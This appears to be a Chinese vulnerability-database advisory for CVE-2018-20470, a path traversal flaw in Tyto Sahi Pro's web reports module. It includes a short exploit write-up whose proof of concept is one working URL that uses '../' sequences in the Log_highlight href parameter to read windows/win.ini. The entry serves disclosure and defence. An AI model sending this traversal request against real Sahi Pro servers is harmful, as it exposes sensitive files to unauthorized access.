Tyto Sahi Pro 路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1633824 漏洞类型 路径遍历
发布时间 2019-06-19 更新时间 2019-07-02
CVE编号 CVE-2018-20470 CNNVD-ID CNNVD-201906-640
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019060123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201906-640
|漏洞详情
Tyto Software Sahi Pro是印度Tyto Software公司的一套自动化测试工具。 Tyto Software Sahi Pro 8.0.0及之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
|漏洞EXP
# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20470


Description :

An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.

POC :

vulnerable URL :

''' replace the ip and port of the remote sahi pro server machine '''


http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
|参考资料

来源:barriersec.com

链接:https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2018-20470